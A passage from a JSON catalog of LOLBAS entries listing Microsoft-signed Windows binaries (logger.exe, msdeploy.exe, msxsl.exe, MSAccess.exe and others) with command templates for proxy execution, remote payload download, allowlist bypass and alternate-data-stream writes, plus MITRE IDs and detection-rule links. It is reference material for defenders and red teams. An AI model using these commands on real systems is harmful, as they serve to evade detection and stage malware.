installation","aliases":[]},{"id":"lolbas:intellitrace-exe:0","toolId":"lolbas:intellitrace-exe","toolName":"IntelliTrace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"IntelliTrace.exe launch /cp:\"collectionplan.xml\" /f:\"c:\\users\\public\\log\" \"C:\\Windows\\System32\\calc.exe\"","description":"Launches an executable via Visual Studio command line utility.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/visualstudio/debugger/intellitrace","https://lolbas-project.github.io/lolbas/OtherMSBinaries/IntelliTrace/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:logger-exe:0","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe RUN \"{CMD}\"","description":"Executes the command specified after the `RUN` parameter as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:logger-exe:1","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe RUNW \"{CMD}\"","description":"Executes the command specified after the `RUNW` parameter as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:logger-exe:2","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe \"{CMD}\"","description":"Executes the command specified as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mftrace-exe:0","toolId":"lolbas:mftrace-exe","toolName":"Mftrace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Mftrace.exe {PATH:.exe}","description":"Launch specified executable as a subprocess of Mftrace.exe.","usecase":"Local execution of cmd.exe as a subprocess of Mftrace.exe.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mftrace.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml"}],"references":["https://twitter.com/0rbz_/status/988911181422186496","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:microsoft-nodejstools-pressanykey-exe:0","toolId":"lolbas:microsoft-nodejstools-pressanykey-exe","toolName":"Microsoft.NodejsTools.PressAnyKey.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}","description":"Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.","usecase":"Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml"}],"references":["https://twitter.com/mrd0x/status/1463526834918854661","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mpiexec-exe:0","toolId":"lolbas:mpiexec-exe","toolName":"Mpiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mpiexec.exe {CMD}","description":"Executes a command via MPI command-line tool.","usecase":"Executes commands under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe","C:\\Program Files (x86)\\Microsoft MPI\\Bin\\mpiexec.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mpiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msaccess-exe:0","toolId":"lolbas:msaccess-exe","toolName":"MSAccess.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MSAccess.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a MSAccess command line"},{"type":"IOC","value":"MSAccess making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MSAccess/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mscopilot-exe:0","toolId":"lolbas:mscopilot-exe","toolName":"Mscopilot.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mscopilot.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher=\"{CMD} && taskkill /f /im mscopilot.exe &&\"","description":"`mscopilot.exe` will spawn the provided command. Parent `mscopilot.exe` process needs to be killed to avoid command being executed an infinite number of times.","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot.exe"],"toolType":"OtherMSBinary","references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mscopilot-proxy-exe:0","toolId":"lolbas:mscopilot-proxy-exe","toolName":"Mscopilot_proxy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher=\"cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&\"","description":"`mscopilot_proxy.exe` will spawn the provided command. Parent `mscopilot_proxy.exe` process needs to be killed to avoid command being executed an infinite number of times.","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot_proxy.exe"],"toolType":"OtherMSBinary","references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot_proxy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdeploy-exe:0","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"{PATH_ABSOLUTE:.bat}\"","description":"Launch .bat file via msdeploy.exe.","usecase":"Local execution of batch file using msdeploy.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdeploy-exe:1","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"{PATH_ABSOLUTE:.bat}\"","description":"Launch .bat file via msdeploy.exe.","usecase":"Local execution of batch file using msdeploy.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdeploy-exe:2","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext}","description":"Copy file from source to destination.","usecase":"Copy file.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msohtmed-exe:0","toolId":"lolbas:msohtmed-exe","toolName":"MsoHtmEd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MsoHtmEd.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml"},{"type":"IOC","value":"Suspicious Office application internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mspub-exe:0","toolId":"lolbas:mspub-exe","toolName":"Mspub.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mspub.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml"},{"type":"IOC","value":"Suspicious Office application internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msxsl-exe:0","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msxsl.exe {PATH:.xml} {PATH:.xsl}","description":"Run COM Scriptlet code within the script.xsl file (local).","usecase":"Local execution of script stored in XSL file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msxsl-exe:1","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msxsl.exe {PATH:.xml} {PATH:.xsl}","description":"Run COM Scriptlet code within the script.xsl file (local).","usecase":"Local execution of script stored in XSL file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msxsl-exe:2","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}","description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","usecase":"Local execution of remote script stored in XSL script stored as an XML file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msxsl-exe:3","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}","description":"Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).","usecase":"Local execution of remote script stored in XSL script stored as an XML file.","mitre":["T1220"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msxsl-exe:4","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}","description":"Using remote XML and XSL files, save the transformed XML file to disk.","usecase":"Download a file from the internet and save it to disk.","mitre":["T1105"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msxsl-exe:5","toolId":"lolbas:msxsl-exe","toolName":"msxsl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name","description":"Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).","usecase":"Download a file from the internet and save it to an NTFS Alternate Data Stream.","mitre":["T1564"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 